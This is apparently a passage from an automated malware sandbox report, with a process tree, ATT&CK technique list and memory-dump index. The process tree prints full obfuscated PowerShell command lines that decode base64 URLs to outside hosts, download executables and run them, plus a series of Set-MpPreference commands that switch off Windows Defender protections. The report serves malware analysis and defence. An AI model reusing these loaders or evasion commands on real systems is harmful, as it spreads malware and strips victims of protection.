      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:416
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:2916
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2176
    - - C:\Users\Public\qar.exe
        
        "C:\Users\Public\qar.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4200
      - C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
        6⤵
        Executes dropped EXE
        
        PID:4904
      - C:\Users\Public\qar.exe
        
        "{path}"
        6⤵
        Executes dropped EXE
        
        PID:4964
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:184
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4224
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - Delays execution with timeout.exe
    PID:1512
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4520
    - - C:\Users\Public\upd.exe
        
        "C:\Users\Public\upd.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4100
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AA01.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4712

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\temp\5dyaglhr.exe
  2⤵
  PID:4196
- - C:\Windows\temp\5dyaglhr.exe
    C:\Windows\temp\5dyaglhr.exe
    3⤵
    - Executes dropped EXE
    PID:4628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4812
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM cmstp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3916

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/356-846-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/400-147-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/400-142-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/416-15-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/548-324-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/612-140-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/612-144-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/824-345-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/1020-333-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/1208-853-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/1412-335-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/1556-231-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/1556-227-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1840-635-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/2000-325-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/2064-825-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/2064-897-0x00000234B8A80000-0x00000234B8A81000-memory.dmp

Filesize
4KB

Download
memory/2132-14-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/2132-18-0x0000000004090000-0x0000000004091000-memory.dmp

Filesize
4KB

Download
memory/2132-28-0x0000000006BA0000-0x0000000006BA1000-memory.dmp

Filesize
4KB

Download
memory/2132-95-0x0000000008EE0000-0x0000000008EE1000-memory.dmp

Filesize
4KB

Download
memory/2132-20-0x0000000006C70000-0x0000000006C71000-memory.dmp

Filesize
4KB

Download
memory/2132-51-0x0000000007C30000-0x0000000007C31000-memory.dmp

Filesize
4KB

Download
memory/2132-98-0x0000000009ED0000-0x0000000009ED1000-memory.dmp

Filesize
4KB

Download
memory/2132-74-0x0000000009350000-0x0000000009351000-memory.dmp

Filesize
4KB

Download
memory/2132-26-0x0000000006B00000-0x0000000006B01000-memory.dmp

Filesize
4KB

Download
memory/2132-44-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

Filesize
4KB

Download
memory/2132-76-0x00000000088F0000-0x00000000088F1000-memory.dmp

Filesize
4KB

Download
memory/2132-32-0x00000000074F0000-0x00000000074F1000-memory.dmp

Filesize
4KB

Download
memory/2132-29-0x0000000007480000-0x0000000007481000-memory.dmp

Filesize
4KB

Download
memory/2132-41-0x00000000072C0000-0x00000000072C1000-memory.dmp

Filesize
4KB

Download
memory/2132-96-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/2176-27-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/2232-236-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2232-240-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/3100-859-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/3236-305-0x0000023C9B7B0000-0x0000023C9B7B1000-memory.dmp

Filesize
4KB

Download
memory/3236-302-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/3236-304-0x0000023C9B600000-0x0000023C9B601000-memory.dmp

Filesize
4KB

Download
memory/3456-348-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/3548-259-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/3548-255-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/3632-626-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/3740-592-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/3908-832-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/3972-682-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4012-130-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/4012-136-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/4104-836-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4156-327-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4200-109-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4200-264-0x0000000009530000-0x0000000009531000-memory.dmp

Filesize
4KB

Download
memory/4200-112-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/4200-115-0x00000000056A0000-0x00000000056A1000-memory.dmp

Filesize
4KB

Download
memory/4200-116-0x00000000055E0000-0x00000000055E1000-memory.dmp

Filesize
4KB

Download
memory/4200-119-0x0000000009000000-0x0000000009001000-memory.dmp

Filesize
4KB

Download
memory/4200-263-0x0000000008E50000-0x0000000008F0A000-memory.dmp

Filesize
744KB

Download
memory/4200-120-0x0000000008B80000-0x0000000008B94000-memory.dmp

Filesize
80KB

Download
memory/4224-43-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4328-612-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4348-251-0x0000000004B50000-0x0000000004C51000-memory.dmp

Filesize
1.0MB

Download
memory/4356-604-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4420-253-0x00000000052B0000-0x00000000052EC000-memory.dmp

Filesize
240KB

Download
memory/4420-219-0x00000000004E0000-0x00000000004E1000-memory.dmp

Filesize
4KB

Download
memory/4420-217-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4428-330-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4452-923-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4468-322-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4520-62-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4564-697-0x0000000007890000-0x0000000007891000-memory.dmp

Filesize
4KB

Download
memory/4564-653-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4564-677-0x0000000008800000-0x0000000008801000-memory.dmp

Filesize
4KB

Download
memory/4580-328-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4596-209-0x0000000000A70000-0x0000000000A71000-memory.dmp

Filesize
4KB

Download
memory/4596-207-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4596-234-0x0000000006DA0000-0x0000000006DDD000-memory.dmp

Filesize
244KB

Download
memory/4600-644-0x0000000004600000-0x0000000004601000-memory.dmp

Filesize
4KB

Download
memory/4628-290-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4628-293-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/4652-884-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4668-339-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4712-68-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4772-315-0x0000000009B10000-0x0000000009B11000-memory.dmp

Filesize
4KB

Download
memory/4772-273-0x00000000081D0000-0x00000000081D1000-memory.dmp

Filesize
4KB

Download
memory/4772-265-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4772-314-0x0000000009740000-0x0000000009741000-memory.dmp

Filesize
4KB

Download
memory/4772-352-0x00000000096B0000-0x00000000096B1000-memory.dmp

Filesize
4KB

Download
memory/4772-358-0x00000000096A0000-0x00000000096A1000-memory.dmp

Filesize
4KB

Download
memory/4772-307-0x00000000099E0000-0x0000000009A13000-memory.dmp

Filesize
204KB

Download
memory/4772-300-0x0000000008B80000-0x0000000008B81000-memory.dmp

Filesize
4KB

Download
memory/4784-226-0x0000000007420000-0x0000000007436000-memory.dmp

Filesize
88KB

Download
memory/4784-225-0x0000000005D50000-0x0000000005D89000-memory.dmp

Filesize
228KB

Download
memory/4784-199-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/4784-196-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4788-670-0x0000000004CF0000-0x0000000004D41000-memory.dmp

Filesize
324KB

Download
memory/4788-629-0x0000000004170000-0x00000000041CC000-memory.dmp

Filesize
368KB

Download
memory/4812-353-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/4904-509-0x0000000008550000-0x0000000008597000-memory.dmp

Filesize
284KB

Download
memory/4904-282-0x0000000000990000-0x0000000000991000-memory.dmp

Filesize
4KB

Download
memory/4904-278-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/4912-370-0x0000000004D10000-0x0000000004D61000-memory.dmp

Filesize
324KB

Download
memory/4912-301-0x00000000041E0000-0x000000000423C000-memory.dmp

Filesize
368KB

Download
memory/4964-281-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/4964-277-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/5032-890-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/5192-744-0x0000011174F90000-0x0000011174F91000-memory.dmp

Filesize
4KB

Download
memory/5192-742-0x0000011174A30000-0x0000011174A31000-memory.dmp

Filesize
4KB

Download
memory/5192-696-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/5204-689-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/5204-687-0x0000000000C80000-0x0000000000C81000-memory.dmp

Filesize
4KB

Download
memory/5244-900-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/5408-373-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/5408-375-0x0000000000800000-0x0000000000801000-memory.dmp

Filesize
4KB

Download
memory/5552-916-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/5604-866-0x00007FFF2C210000-0x00007FFF2CBFC000-memory.dmp

Filesize
9.9MB

Download
memory/5884-671-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/5884-660-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/5956-553-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/5956-657-0x0000000000980000-0x00000000009D9000-memory.dmp

Filesize
356KB

Download
memory/5956-545-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download
memory/5980-544-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/5980-549-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/5988-649-0x000000006FE00000-0x00000000704EE000-memory.dmp

Filesize
6.9MB

Download